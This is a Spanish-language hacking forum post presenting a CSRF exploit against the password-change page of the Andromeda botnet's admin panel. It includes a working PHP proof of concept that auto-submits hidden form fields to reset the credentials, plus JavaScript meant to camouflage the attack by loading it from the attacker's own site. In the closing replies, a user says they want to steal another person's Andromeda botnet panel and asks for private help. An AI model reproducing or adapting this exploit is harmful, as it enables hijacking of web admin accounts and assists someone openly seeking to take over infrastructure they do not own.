Bueno despues de analizar la botnet Andromeda, despues de que la liberaran, (Podeis encontrarla aqui: http://www.indetectables.net/viewtopic.php?p=395956&sid=13cf3c88fc9560dba5bb5e6ed93c4b9b) despues de encuentrar varias vulnerabilidades, pero que es normal que esten, como xss y demás..
Ya que se supone que solo va a utilizar el panel el administrador, y para que va a quererse hacer daño así mismo?.
Pero hasta que encontre, el directorio donde cambiamos nuestra contraseña etc etc..
Y no chequea el toquen ni el reffer, así que supose que seria vulnerable y empeze a crear el poc.
Más alla de todo, lo dificil es encontrar la web y el directorio, aunque si nos infectamos y conocemos a la persona.., pues se la podemos colar no?.
Bien, para no hacer tan descarado como siempre que público un csrf, utilizo el JS siguiente para camuflar.
// This code was coded by FrenetikK & Mor3nako.
function writeIf(url) {
document.write('');
}
writeIf('http://127.0.0.1/csrf.php');
Simplemente, si tenemos nuestro csrf subido a nuestra web: ahfiuahfa.com , y se llama csrf.php pues cambiamos el 127.0.0.1 por el de nuestra web sencillo no? xD.
Y en el index.html simplemente colocamos una redireccion hacia el JS. Supongamos que nuestro archivo se llama a.js.
<script src="a.js"></script>
Pues aqui el csrf,
<?php
//POC Change Password Andromeda Botnet
//codded: @Matabarras
$url = "web";
$form['newlogin'] = "admin";
$form['newpass1'] = "admin";
$form['newpass2']= "admin";
echo '<html><body onLoad="document.csrf.submit();">';
echo '<form name="csrf" action="http://'.$url.'/nombredeldirectorio/?act=service&subact=logindata" method="POST">';
foreach($form As $key=>$value) {
echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo '</form></body></html>';
?>
Una vez entren a la web que no se daran cuenta de nada gracias al JS.
Se le cambiara el usuario y contraseña y para acceder a la web simplemente pondremos en usuario Admin y en contraseña lo dejamos vacio.
Un saludo
peeerdona pero no entendi nada :S , subi el csrf en .php , a mi web , y tengo un cpanel de un botnet andromeda que no es mio , es de otro loco que no se qien es , pero mi idea era robar esa andromeda bot , pero no se cmo tendrias skype , facebook o algo? gracias :)
podrias ser mas especifico o podes hacer un comentario en privado? ... gracias